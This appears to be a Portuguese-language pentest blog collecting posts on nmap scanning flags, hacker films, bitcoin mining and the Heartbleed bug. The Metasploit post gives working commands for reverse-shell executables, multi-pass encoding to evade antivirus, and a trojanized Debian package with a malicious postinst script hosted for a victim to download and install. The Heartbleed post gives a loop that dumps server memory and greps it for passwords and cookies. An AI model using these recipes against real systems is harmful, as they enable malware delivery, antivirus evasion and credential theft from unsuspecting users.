– root@injetionsec:~#

Algumas opções de desempenho de scanning de porta – nmap

19.08.2015 (9:55 pm) – Filed under: Redes ::

Galera abaixo algumas opções de desempenho de scanning de porta utilizado para otimizar.

-T0 a -T5 : que vai do mais lento (-T0) ate ao agressivo (-T5)

–min-rtt-timeout,–max-rtt-timeout,–initial-rtt-timeout : quantidade minima, máxima e inicial de tempo que o nmap vai esperar por uma resposta a um determinado exame de porta

–host-timeout : especifique um determinado tempo que um host demore.

–min-rate,–max-rate : ajusta a limite inferior e superior de pacotes enviado pelo nmap a cada segundo

–max-retries : especifica o numero máximo de retransmissão dos scanning a uma unica porta

–mim-hostgroup,–max-hostgroup: define o numero minimo e máxima de hosts dos quais você quer examinar as portas em paralelo

–min-parallelism,–max–parallelism : limita o numero máximo e minimo de exames que pode ser feito

–scan-delay,–max-scan-delay : faz com que o nmap espere um determinado tempo entre o envio de pacotes a quaisquer host individual

–osscan-limit : faz com que o nmap não disperdesse tempo com host que não tenham porta aberta

Algumas flags – NMAP

17.06.2014 (6:34 pm) – Filed under: Pentest,Redes ::

Galera estou estudando para CEH e achei legal essas flags mais usuais nesse scanning de rede que é o nmap,veja abaixo

0123e409fu23

O nmap e um scanning de rede bastante útil para descoberta de banner de aplicação,SOs,bypass de firewall e IDS/IPS dentro outras flags que temos nessa ferramenta,vejamos algumas:

XMAS TREE: essa varredura envia um pacote do tipo FIN,URG,PSH já definidos,se a porta estiver aberta não à nenhuma resposta,mas se estiver fechada o alvo vai retornar os pacotes RST/ACK,essa flag XMAS TREE trabalha com a RFC 793 implementando os protocolos TCP/IP
FIN : essa varredura e semelhante ao XMAS , mas envia um pacote com a flag FIN ,e recebe a mesma resposta, tem as mesma limitações do XMAS
NULL : essa varredura e semelhante ao XMAS e ao FIN é suas limitações e respostas são apenas que envia somente um pacote com nenhuma flag ativa
IDLE : essa varredura usa um IP falso para enviar um pacote SYN para destino,dependendo da resposta a porta pode ser determinada como fechada ou aberta,ele determina a resposta da porta pelo monitoramento do cabeçalhos do pacote IP e de suas sequencias de números

Você pode ver mais coisas do nmap nos post que já falei, e aos poucos vou postando mais dicas dessa ferramenta por aqui 😉

Detalhando o NMAP,parte 1

26.12.2013 (5:17 pm) – Filed under: Pentest ::

Bom galera vamos falar um pouco dessa ferramenta incrivel que e o nmap.

# As fases do NMAP

  •  Enumeração de alvo : nessa fase o nmap procura especificações fornecidas pelo usuario, o que pode ser combinado com resolução de DNS,notação CIDR, endereços IPs e etc,esta fase não pode ser omitida uma vez que e essencial para os exames.
  •  Descoberta dos alvos : a varredura em redes normalmente começam pela descoberta dos alvos que estão ativos para assim investigarmos com mais detalhe, esse processa podemos também chamar de exame de ping,essas descobertas vão desde a tecnicas de solicitações ARP á tecnicas mais elaboradas de TCP/UDP
  •  Resolução de DNS inverso : depois que o nmap tiver descoberto os hospedeiros ele procura pelo DNS inverso de todos os encontrados no exame anterior, esse passo pode ser omitido se adicionarmos a flag “-n” que significa sem resolução ou caso queira cobrir todos os alvos pode usar a flag “-R” que significa resolver todos os nomes
  •  Exames de porta : esse parte é a fundamental pos as provas são enviadas e as respostas a essa analise sçao usadas para saber se tal porta esta aberta “open”, fechada “closed” ou filtrada “filtered” , embora você pode omitir essa parte com mecanismos de scripts especificando suas particularidades (–traceroute, –script) e interessante deixa-lo por padrão.
  •  Detecção da Versão : Caso algumas portas forem descobertas é as mesma forem encontradas abertas o nmap e capaz de descobrir e determinar a versão do software que esta rodando no servidor, e como ele faz isso ? ele faz isso atravez de um banco de dados com milhares de assinaturas de serviços conhecidas, por isso e importante ter sempre o nmap mais atual
  •  Detecção de SO : caso utilize a flag “-O” o nmap ira proceder com a detecção de sistema operaçional,e como ele faz isso ? os sistemas operacionais implementam diferentes padrões de rede,por essas diferenças ele determina o sistema operacional que esta rodando naquela hora,com uma base de dados de mais de 1000 respostas conhecidas de sistemas operacionais.
  •  Traceroute : tem uma otimização boa de traceroute que pode ser abilitada pela flag “–traceroute” podendo encontrar rotas de redes tudo em paralelo, usando assim os melhores pacotes de prova disponiveis.
  •  Exame de Script “NSE” : usa uma coleção de scripts para obter infomaçoes mais detalhada como versão,notificação de vulnerabilidade de serviços e descobretas ate de backdoor e de outros malwares nos host destino, ele e programado em linguagem lua.
  •  Saída : Então chegamos a saida onde e feito a coletada de todas as informações que ele reuniou e salvou em algum arquivo de sua preferencia.

Técnicas de descoberta do NMAP

03.12.2013 (1:25 pm) – Filed under: Pentest ::

Um dos primeiros passos em qualquer missão de reconhecimento de uma rede é reduzir um conjunto de faixas de endereços IP, em uma lista de hosts ativos e interessantes. Administradores,usuários mau intencionados podem estar apenas interessados em hosts que executam um determinado serviço, enquanto os auditores de segurança podem se importar com cada dispositivo que possuir um endereço IP. Podemos usar o ping ICMP para localizar os hosts na rede interna, enquanto um profissional externo de análise de vulnerabilidades (penetration tester) pode utilizar um conjunto diversificado de dezenas de sondagens em uma tentativa de burlar as restrições do firewall,dentre outras flags muitos interessantes,vamos continuar o post de nmap visto que falamos um pouco nesse tópico a um tempinho atras,veja abaixo:

->Execute um ping apenas
nmap -sP [alvo]

->Não utilizando o ping
nmap -PN [alvo]

->Utilizando o TCP SYN
nmap -PS [alvo]

->Utilizando o TCP ACK
nmap -PA [alvo]

->Utilizando UDP
nmap -PU [alvo]

->Utilizando o Eco ICMP
nmap -PE [alvo]

->Utilizando o ICMP Timestamp
nmap -PP [alvo]

-> Utilizando o Protocolo IP
nmap -PO [alvo]

-> Utilizando o ARP
nmap -PR [alvo]

-> Scanner usando o traceroute
nmap –traceroute [alvo]

->Scan para forçar a resolução reversa do DNS
nmap -R [alvo]

->Desativar a resolução reversa de DNS
nmap -n [alvo]

->Pesquisa de DNS alternativo
nmap –system-dns [alvo]

Especificar manualmente o servidor DNSs
nmap –dns-servers [servidores] [alvo] 

->Criar uma lista de host
nmap -SL [alvos]

Bom galera ate o próximo tutorial de NMAP =)

Técnicas básicas do nmap de Scan

07.11.2013 (11:17 am) – Filed under: Pentest ::

Estudando um pouco livro do nmap e fazendo algumas anotações vou postar um série de comandos essenciais para sua analise quando estiver fazendo uma auditoria, vamos alguns scan básicos :

 

->Scan de Hosts aleatórias
nmap-iR [número]
ex.: nmap-iR 0

->Excluindo alvos de uma varredura
nmap [alvos] –exclude [alvos]
ex.:nmap 192.168.0.1/24 –exclude 192.168.0.100, 192.168.0.200
Obs.: dois traços antes do exclude

->Excluindo alvos usando uma lista
nmap [alvos] –excludefile [list.txt]
ex.: nmap 192.168.0.1/24 –excludefile notargets.txt
Obs.: dois traços antes do excludefile

->Executar uma varredura agressivo
nmap -A [alvo]

->Digitalizar um alvo IPv6
nmap -6 [alvo]
ex.: nmap -6 1gff:35c1:46c5:0000:0000:0000:0000:2afe

->Scan de um  único  alvo
nmap [target1]

->Scan vários alvos
nmap [target1, target2, target3, etc]

->Scan uma lista de alvos
nmap -IL [listaIPs.txt]

->Scan de uma variedade de IPs
nmap [intervalo de endereços IP]
ex.: nmap 192.168.0.1-10

->Scan de uma sub-rede inteira
nmap [endereço ip/CDIR]
ex.: nmap 192.168.0.1/24

 

Ate o próximo tópico do nmap

Séries, filmes e documentários sobre hacking

02.06.2015 (6:49 pm) – Filed under: Dicas ::

Galera para quem curte filmes,documentários,séries relacionado a crimes cibernéticos, engenharia social com ação e etc resolvi fazer uma lista com algo relacionado ou cena/episódios envolvendo esses assuntos , segue

› › › Filmes sobre tema hackers

01. Firewall – Segurança em Risco (2006)
02. A Chamada (2009)
03. Hackers – Piratas de Computador (1995)
04. Ameaça Virtual (2001)
05. Paranoia 1.0 (2004)
06. Caçada Virtual (2000)
07. A Senha: Swordfish (2001)
08. Jogos de Guerra (1983)
09. Quebra de Sigilo (1992)
10. Minority Report: A Nova Lei (2002)
11. Duro de Matar 4.0 (2007)
12. 007: Operação Skyfall (2012)
13. Quebra de Sigilo (1992)
14. O ultimato Bourne (2007)
15. Matrix Reloaded (2003)
16. Hackers 2: Operação Takedown (2000)
17. Tron: uma odisseia eletrônica (1982)
18. Underground (2012)
19. Moroz po kozhe (2007)
20. Millennium: Os Homens que Não Amavam as Mulheres (2009)
21. O Quinto Poder (2013)
22. The Social Network (2010)
23. Hackers – Piratas do Computador (1995)
24. A Rede (The Net) (1995)
25. The Internet’s Own Boy: The Story of Aaron Swartz (2014)
26. Reboot (2012)
27. The Girl with the Dragon Tattoo (2009)
28. Untraceable (2008)
29. The Score (2001)
30. The Italian Job (2003)
31. Blackhat (2015)
32. Pirates of Silicon Valley (1999)
33. The Conversation (1974)
34. Wargames (1983)
35. The Hacker Wars (2014)
36. Hacker’s Game (2015)
37. Code 2600 (2011)
38. Hackers Are People Too (2008)
39. Terms and Conditions May Apply (2013)
40. Hacking Democracy (2006)
41. Dsknectd (2013)
42. Who Am I (2014)
43. A Rede 2.0 (2006)
44. Prenda me se for capaz (2002)

› › › Documentários,séries sobre tema e/ou trechos com hackers,engenharia social,crimes cibernéticos

01. ALGORITHM: The Hacker Movie (2014)
02. Lie to Me (2009)
03. CSI: Cyber (2015)
04. Mr. Robot (2015)
05. The Mentalist [O mentalista] (2008)
06. Deep Web, Director: Alex Winter  (2015)
07. In Search of The Most Dangerous Town On the Internet (2015)
08. BBC Horizon Inside The Dark Web (2014)
09. Zero days – security leaks for sale (2015)
10. The IT Crowd (2006)

 

Referência:
http://www.operariosdaweb.com.br/10-filmes-sobre-informatica/
https://blog.kaspersky.com.br/os-10-melhores-filmes-sobre-hacks/1178/
https://maniacosporfilme.wordpress.com/2014/04/12/
http://cinema.uol.com.br/noticias/redacao/2013/10/21/filme-sobre-o-fundador-do-wikileaks-tem-uma-das-piores-estreias-do-ano.htm
http://www.imdb.com/title/tt1285016/
http://netforbeginners.about.com/od/readerpicks/ss/The-Best-Hacker-Movies_33.htm#step-heading
https://web.archive.org/web/20150324065525/http://krypted.com/sites/top-25-best-hacking-and-computer-geek-movies/
http://www.imdb.com/title/tt3312868/
http://moviecode.tumblr.com/
http://nmap.org/movies/

 

Comandos do metasploit – part 4

06.10.2014 (5:23 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2
comandos do metasploit – parte 3

Galera,continuando a nossa séria de posts de metasploit, vejam:

Serviço de indentificação : o nmap realiza o scanner de varios serviços na rede destino,temos também uma veriedade de scanner para
determinados serviços e objetivos no metasploit

msf > search auxiliary ^scanner

Nessus no msfconsole: tem aquelas situações que optamos por usar linha de comando utilizando o nessus diretamente no metasploit, o
nessus e um scanner de vulnerabilidade

msf > load nessus
msf > nessus_help

Startamos o nessus e depois podemos ver os plugins instaldos no comando acima “nessus_help”, percebemos que o nessus e bastante
completo,Para ver as políticas de exploração que está disponivel utilizamos o seguinte comando “nessus_policy_list”

msf > nessus_policy_list

Fuzzer : e uma ferramenta utilizada por profissionais de segurança para para ver se os dados são validos e se tem algum aviso de
entrada valida no programa, e muito utilizado em buffer overflow,ataques de diretorio transversal,vulnerabilidade web de injecção,como
xss,slqi, e muitas outras, o metasploit ofere um modulo para essas tarefas
Binarios, payloads : uma das capacidades do metasploit e gerar um executavel a partir de um payload, isto e muito util nos casos de
engenharia social onde podemos conseguir executar esse payload se passando por um software autentico,vamos gerar um payload de shell
inverso para conseguir acesso remoto ao sistema, vamos utilizar o “msfpayload” este comando ira gerar cargas para ser usado em um
serie de variedades de ataques,veja os comandos

root@bt:# msfpayload windows/shell_reverse_tcp O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=[SEU IP] LPORT=31337 O
root@bt:# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 X > /tmp/progr.exe

Agora temos um executavel para funcionar no windows, vamos agora usar o “multi/handler”

msf > use exploit/multi/handler
msf exploit(handler) > show options
Quando se utiliza o modulo “exploit/multi/handler” temos que direcinar um payload para assim injetar

msf exploit(handler) > set payload windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST [SEU IP]
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > exploit

Bypass em antivurus : muitos payload gerados nos metasploit podem baypass os antivirus, mas vemos que a maioria esta atualizada e um
pouco obsoleto,vamos codificar o nosso executavel produzido utilizando o comando como msfencode com a seguinte flag “-h” para vermos
os comandos

root@bt:/pentest/exploits/framework3# msfencode -h

Vamos ver qual codificadores podemos injetar com a seguinte flag “-l”

root@bt:/pentest/exploits/framework3# msfencode -l

Iremos então codificar o com o shikata_ga_nai em executaveis do windows

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t exe > /tmp/prog2.exe

Se formos verificar esse arquivos em scanner online de malware vemos o seguinte resultado

http://virusscan.jotti.org/pt-br/scanresult/e528fc54926dec35e3a1f60892ac07e5de9ec59c

Vamos então tentar usar 3 codificadores diferentes para com 10 vezes cada um,vamos ter um binario mais trabalhado vejamos o camando

root@bt:/pentest/exploits/framework3# msfpayload windows/shell_reverse_tcp LHOST=192.102.12.2 LPORT=31337 R | msfencode -e
x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t
exe > /tmp/prog2.exe

Podemos perceber que na maioria das vezes os antivurus com mais codificadores injetados podem ser sucessivel a encontrar algum binario
malicioso ou não, mas hoje a maioria

Para prosseguir com o ataque você pode mandar esse binario para o alvo e executa-lo, ja na maquina alvo execute o seguinte comando

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.102.12.2 LPORT=31337 E

Criando trojan em linux : vamos descarregar um pacote para que possamos infecta-lo,vejam os comandos

root@bt:/pentest/exploits/framework3# apt-get –download-only install [qualquer pacote]
root@bt:/pentest/exploits/framework3# mkdir /tmp/pacote
root@bt:/pentest/exploits/framework3# mv /var/cache/apt/archives/[qualquer pacote].deb /tmp/pacote
root@bt:/pentest/exploits/framework3# cd /tmp/pacote
root@bt:/tmp/pacote

Vamos então extrair o pacote e criar um diretorio chamado DEBIAN para assim manter-mos as mesmas caracteristicas dele.

root@bt:/tmp/pacote# dpkg -x [qualquer pacote].deb work
root@bt:/tmp/pacote# mkdir work/DEBIAN

entramos no diretorio debian e criamos um arquivo “control” com as seguintes informações:

Package: nome do pacote
Version: 1.56-1
Section: Games
Priority: optional
Architecture: i386
Maintainer: Ubuntu Developers (ubuntu-dev@ubuntu.com)
Description: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

vamos criar também um script de pos instalação quando o binario for executado,chamado “posinstall”

root@bt:/tmp/evil/work/DEBIAN# nano postinst
#!/bin/sh
sudo chmod 2777 /usr/games/[nome do pacote] && /usr/games/[nome do pacote] & /usr/games/pacote &

Agora vamos criar um payload malicioso e uma shell inversa para conectar com nosso pacote

root@bt:/pentest/exploits/framework3# msfpayload linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 X >
/tmp/evil/work/usr/games/freesweep_scores

Agora vamos executar nossa instalação e construção do novo pacote, esse arquivo se chamara “arq.deb” que vai se chamavar novamente com
o nome do arquivo original do pacote

root@bt:/tmp/pacote/work/DEBIAN# chmod 755 postinst
root@bt:/tmp/pacote/work/DEBIAN# dpkg-deb –build /tmp/evil/work
root@bt:/tmp/pacote# mv arq.deb nome do pacote original.deb
root@bt:/tmp/pacote# cp pacote original.deb /var/www/

Startamos o servidor apache

root@bt: /etc/init.d/apache2 start
root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.102.12.2 LPORT=443 E

Agora passamos o link para vitima baixar, apos isso a maquina alvo vai executar os seguintes comandos

ubuntu@server:~$ wget http://192.102.12.2/nome do pacote original.deb
ubuntu@server:~$ sudo dpkg -i nome do pacote original.deb

È isso ai galera fico por aqui, ate o próximo tópico.

Moedas Virtuais – criptográficas

12.04.2014 (11:56 am) – Filed under: Moedas Virtual ::
001 - Moeda Criptográfica

Tudo se inicia quando o  Satoshi Nakamoto (pessoa ou grupo supostamente detentor(a), hoje, de quase um milhão de bitcoins ) desenvolve o que foi chamado de “Bitcoin: A Peer-to-Peer Electronic Cash System” , qual era a ideia,de se  criar uma moeda virtual entretanto, foi após o advento da rede bitcoin que o conceito de moeda criptográfica veio à tona.

É importante relevar que essa nova moeda virtual tende a se extinguir com o tempo, como podemos acompanhar pelo site coinmap.org,a regra de geração de blocos estabelece que cada novo bloco seja gerado a cada dez minutos,ora, neste ritmo serão gerados 144 blocos por dia ou 56.560 blocos por ano. Portanto, a cada quatro anos, são gerados em média 210 mil blocos,por que neste período o número de bitcoins emitidas cai pela metade. O que é fácil de regular: basta reduzir à metade o número de bitcoins contidos em cada novo bloco.

Hoje existem precisamente 12.323.675 bitcoins em circulação. Veja a evolução da emissão ao longo do tempo na página “Total de Bitcoins em Circulação” (pare o ponteiro do mouse sobre a linha do gráfico para ver o número correspondente),fica fácil calcular quando a última bitcoin será emitida: no ano da graça de 2040. A partir daí a emissão cessará completamente,se isto se aplicasse ao bitcoin que, como vimos, hoje vale cerca de R$ 1100,00 podemos ver no site mercadobitcoin.

002 - No Brasil

O bitcoin, não há bancos como intermediários. A moeda que só existe no ambiente virtual foi criada há apenas 4 anos e circula por meio de transações entre “carteiras” que existem nos computadores dos usuários,o Banco Central brasileiro declarou em nota ao G1 que o assunto não tem importância no momento. “A própria lei estabelece que sejam regulados apenas os arranjos de pagamentos que, segundo avaliação técnica, possam ter importância sistêmica. O BC analisou o emprego de bitcoins e, por ora, considera que ele não é de relevância para o sistema financeiro brasileiro”.

Transferir bitcoins atualmente não custa nada. Esse cenário torna a moeda atrativa para quem precisa enviar dinheiro de um país para outro, processo em que taxas bancárias e de câmbio inflam os custos. Já existem brasileiros donos de hostels (albergues), lojas de suplementos vitamínicos, bares e até profissionais como taxistas e chaveiros que fazem suas transações com bitcoins.

003 - Sem mediação dos governos 
Para o professor Pedro Duarte Garcia, da Faculdade de Economia, Administração e Contabilidade (FEA) da Universidade de São Paulo (USP), o bitcoin não se diferencia muito de outras moedas sob o ponto de vista monetário.
 “É uma moeda virtual que, como qualquer moeda atual hoje no mundo, é baseada na confiança. Ela funciona e é usada enquanto todo mundo que usa acredita que ela funciona. Isso é comum a qualquer moeda que a gente carrega no bolso.” Além disso, o bitcoin não passa pelo sistema bancário e, por isso, não é regulado por nenhuma autoridade, o que gera preocupação em alguns países. Assim, organizações que tiverem suas economias bloqueadas por pedidos de governos – como o WikiLeaks, empresa que já teve interrompido o acesso à sua conta bancária – podem se beneficiar das facilidades de transferências de dinheiro entre países ao não passarem pelos sistemas convencionais.
 “A atividade econômica não vai ser atingida por uma mudança. Mas quem sofre diretamente o impacto disso é o governo, porque a capacidade de arrecadação diminui, já que há uma série de impostos que dependem do sistema bancário ou de um sistema que conte com o CPF da pessoa, o que deixa de existir.
004 - Comercio no Brasil 
No Brasil há possibilidade de se comercializar (converter em/de moeda estatal) duas moedas virtuais: bitcoin e litecoin. Através de cadastro no site mercadobitcoin, o usuário pode efetuar compras e vendas a um custo percentual (intermediação). Essa empresa é uma sociedade limitada e está registrada na Receita Federal com a atividade econômica secundária descrita como “Atividades de intermediação e agenciamento de serviços e negócios em geral, exceto imobiliários”. Há ainda outros bons sites no exterior, já conhecidos dos investidores, nos quais se pode transacionar outras coins como o MtGox (mtgox.com), e BTC-E (btc-e.com).
005 - Outros Métodos
Outro método é o de mineração da moeda diretamente pela rede peer-to-peer. Para tanto, o interessado deve dispor de poder computacional para o processamento de hashes que comprovam sua participação na construção da cadeia de blocos, temos então uam segurança que é fortalecida  a cada novo minerador de confiança que se conecta à rede,
Os softwares específicos para a mineração (minerd, cgminer, cudaminer e etc) coletam as transações da rede, validando e  evitando as conflituosas, inserindo nos grandes blocos, e processam os hashes criptográficos inúmeras vezes, até encontrar um bom o bastante para uso. Após isso submetem o bloco para a rede, adicionando-o assim na  cadeia de bloco,assim os mineradores estão, em suma, automatizando o processo de segurança da rede e recebendo uma recompensa em troca,abaixo vemos o processo de uma gpu usando o cgminer
006 - Viável essa mineração 
A mineração através das GPUs de 2ª geração ainda é possível para moedas alternativas e ou novas, a maioria baseada no algoritmo Scrypt[1], como a litecoin,quando a mineração e feita por bitecoin eles usam algoritmo sha-256 [2] e o retorno visando o $$  só é alcançado com o uso de ASIC [3] (Application-specific integrated circuit) (3ª geração), haja vista o seu baixo consumo de energia e alto poder de processamento, comparado às GPUs.Isso se dá mais pela dificuldade que as moedas tem em seus algoritmos. Logo as moedas scrypt atingirão um nível de dificuldade tão alto que suas minerações só se darão através de ASICs também.
007 - Quando falamos de GPU - Rigs 
Rigs são equipamentos que tem como objetivo  minerar o máximo possível com o mínimo de energia. Seu efetivo funcionamento depende do conhecimento do interessado e da disponibilidade de partes GPUs, Placas mãe, ASICs que se tem no mercado,alguns mineradores visão o $$ outros querem montar sua rigs só para verem o poder de processamento e funcionando.

Minerador com 6 (seis) GPUs (2 placas-mãe) ______Minerador com 4 (quatro) GPUs

008 - Detalhando mais como funciona os coins
Veja o info gráfico no Link “melhor visualização de um zoon na imagem”
O que está por trás de uma operação que envolve bitcoins não é exatamente um caminho muito simples. Além do infográfico acima, que apresentamos acima o caminho de uma transação, há detalhes mais técnicos de como o bitcoin é usado. Veja abaixo:
008.1 – Carteiras e endereços
A “carteira” do Bitcoin é o arquivo que guarda o par de chaves públicas (que toda a comunidade pode verificar) e privadas usadas na autorização das transações. O endereço de Bitcoin é formado a partir de uma codificação da chave pública, para representá-la de uma forma mais compacta.

008.2 – 
Chave pública e privada
O sistema de chave pública e privada não é exclusivo do bitcoin – ele é base de muitos sistemas de confiança e criptografia digitais, inclusive parte do “cadeado” que aparece em sites seguros da web e os certificados digitais brasileiros (como o e-CPF). Funciona da seguinte forma: a chave pública pode ser usada para verificar se uma assinatura digital foi gerada pela chave privada, bem como codificar dados que somente a chave privada poderá abrir. Ou seja, a chave pública é para o uso dos outros, enquanto a chave privada é usada por você.
Uma transação de bitcoins inclui a chave pública do(s) destinatário(s). Quando essa transação for referenciada como origem do dinheiro, apenas a chave privada, que somente o destinatário possui, será capaz de gerar o código autorizador (assinatura digital) que será aceito. Caso alguém roube sua “carteira”, que contém a chave privada, essa pessoa poderá gerar as assinaturas e gastar seu dinheiro. Tudo no bitcoin é um contrato que exige sua assinatura.

008.3 – 
Bloco e corrente de blocos
Todas as transações de bitcoin são reunidas em blocos. Um bloco é “ligado” ao bloco anterior informando qual foi o “hash” (um código que é calculado e aceito pela rede de bitcoins), formando a “corrente de blocos” até o primeiro bloco do bitcoin. Ou seja, ao ler todos os blocos é possível ver todas as transações já realizadas com a moeda.
O hash é um número que representa uma informação, gerado a partir de uma fórmula preestabelecida. Mínimas alterações nos dados geram um hash completamente diferente e imprevisível. Dessa forma, alterar os blocos do bitcoin mantendo os hashes já computados é extremamente difícil, o que protege a corrente contra manipulação do seu “passado”. O hash, por ser um número muito grande, costuma ser representado em hexadecimal, ou seja, com números de 0 a 9 e letras de A a F.

008.4 – 
** Mineradores
Os Mineradores montam os blocos do bitcoin. Primeiro, eles agrupam as transações que estão sendo propagadas na rede, mas que ainda não foram inclusas em um bloco já ligado com a corrente. Uma vez com o bloco montado, o minerador calcula o “hash” para o bloco. Mas o bitcoin não aceita qualquer hash.Calcular o hash dos mesmos dados sempre terá o mesmo resultado. Existe, portanto, um dado dentro do bloco que o minerador pode manipular. Esse dado é apenas um número, chamado de “nonce”. O minerador então começa a calcular repetidos hashes do bloco, alterando apenas o número nonce a cada tentativa.
Como o “hash” é apenas um número, o bitcoin estabelece um valor máximo para o hash. O bitcoin trabalha com números extremamente grandes, mas, para fins de exemplo, vamos supor que o hash não pode ser maior do que 8. Quando o minerador encontrar um “nonce” que faz o bloco ter um hash 6, por exemplo, ele propaga isso para a rede. O bloco está resolvido e pode integrar a corrente de blocos.Blocos de bitcoins devem levar, em média, 10 minutos para terem seu “nonce” encontrado. Caso os mineradores estejam encontrando o “nonce” muito rapidamente, o valor máximo (8, no exemplo) é diminuído, para dificultar o trabalho. Caso os mineradores estejam muito lentos, o valor máximo é aumentando, facilitando o trabalho, pois o número de hashes válidos aumenta. Esse ajuste é proporcional e é calculado pela rede periodicamente, baseando-se na velocidade média de geração de cada bloco.Pelo seu trabalho, os mineradores ganham uma quantidade de bitcoins. Atualmente, esse valor é de 25, mas ele será diminuído pela metade quando a rede atingir determinado número de blocos, até que moedas não sejam mais geradas. O minerador também fica com o “troco” de todas as transações do bloco, caso esse troco não tenha sido “devolvido” ao pagador na transação.

008.7 – 
Blocos órfãos
Caso dois mineradores encontrem um “nonce” juntos ou quase juntos, a rede terá dois blocos válidos em circulação. Eventualmente, um novo bloco será gerado, mas ele referenciará apenas o hash de um dos blocos anteriores. O bloco que sobrou, chamado de “bloco órfão”, é descartado. Se a transação foi incluída apenas no bloco órfão, ele terá que ser novamente incluída em um bloco futuro, o que pode fazer com que uma transação leve mais de 30 minutos até ser oficialmente parte do histórico do bitcoin. 
008.8 – Calculo Kh/s e dificuldade
Podemos calcular a dificuldades dessas moedas pelos seguintes links
008.9 – Onde vemos mais informações desses coins
Nesses link001 ,link003,link002 podemos ver galera as dificuldade,se a moeda esta em baixa,alta, e etc.

 

Fontes : techtudo.com.br | g1.globo.com | hackingbits.com | [1]en.wikipedia.org | [2] en.wikipedia.org | [3] pt.wikipedia.org | folhaparanatinga

Ataque da semana OpenSSL Heartbleed

11.04.2014 (5:23 pm) – Filed under: Pentest ::

Homer-Simpson

Bem galera vamos explicar mais ou menos o que de fato esta ocorrendo nesse bug heartbleed,

Heartbleed é um pequeno bug, que tem uma falha especifica da  biblioteca SSL,é  um pedaço de lógica que diz respeito à implementação do OpenSSL do mecanismo TLS ‘ Heartbeat’.O bug está presente nas versões OpenSSL1.0.1 através 1.0.1f,muitos desses servidores são susceptíveis vulnerável.

Um invasor pode descriptografar sessões em curso TLS ou roubar informações úteis, uma vez que um atacante obtem as  principais chaves privadas do servidor ele pode potencialmente descriptografar sessões anteriores.O pior de tudo o exploit não deixa rastros,emuitos estão preocupados em sanar o SSL de servidores web mas estão esquecendo dos outros serviços como VPN, POP, IMAP, SMTP e etc que estão sem fazer nada.

4893rp

No CVE podemos ver que é possível capturar 64k de cada vez

Mas se fizemos isso : while [ 1 ]; do echo $( python heartbleed.py sitevulneravel.com -p 443) >> dump_memoria_1.log ; done

com isso podemos capturar um numero infinito de logs  de uma  área aleatória da memoria para depois analisar-mos,podemos usar os seguintes comandos para analisar,Obs.: é dois traços antes do color veja a imagem.

tail -f dump_memoria_1.log | grep -i pass –color  

ou

tail -f dump_memoria_1.log | grep -i cookie –color

Saiu também no nmap NSE  um plugin para checar a vulnerabilidade heartbleed  entre no diretorio /usr/share/nmap/scripts/  e salve, podemos usar esse scan da seguinte forma,obs.: antes do script use dois traços 

nmap -p 21,990,1194,443,8443,993,995,465,4430 -sC –script heartbleed.nse 192.168.0.1-255

Então galera e recomendado 

1- Fazer a atualização do OpenSSL
2- Revoguem o certificado
3- E troca das senhas dos usuários.

E isso galera =]

Script relatório/reportando

20.12.2013 (4:26 pm) – Filed under: Pentest ::

Um script legal que esta lendo esses dias é o nmap-diff.pl ele na verdade fornece um relatório diário de alterações, como pode ser visto abaixo:

9oijfdoi

Suas opções são :

./ nmap-diff.pl [-hv] [-s ] [I- ] [-B ] [M- ] [-L ]
  -h help 
  -v modo verbose. Isto irá adicionar todas as portas alterados.  
  -s  mostra apenas as sub-rede.  
  -I  relata os IPs específicos.
  -B  define uma base para  dias para assim comparar
  -L  para especificar onde o diretório de log  -M  enviar um e-mail com o relatorio

 

O outro script e o nmap-report que faz com que as consultas aos dados seja mais facil, ele recebe as especificações tais como porta,SOs, e encontra todos os sistemas correspondentes a eles num dado dia,como podemos ver abaixo:

0990hgf

Suas opções são :

/ nmap-report.pl [-hsvVf] [-p ] [-B ] [-L ]

  -H help 
  -v modo verbose, acrescenta DNS e um relatório completo de todas as portas abertas
     contanto que você use não a flag -p 
  -V modo verbose, acrescenta outras informações do nmap, como sistema operacional, portas ignoradas,
     e informações de seqüenciamento quando disponível
  -F é utilizado com a ferramenta portscan e é para gerar uma lista de
     impressões digitais de um host.
  -p relata em uma porta específica. 
  -B especifica uma base. 
  -L especifica onde o diretório de log


Ate a próxima galera =)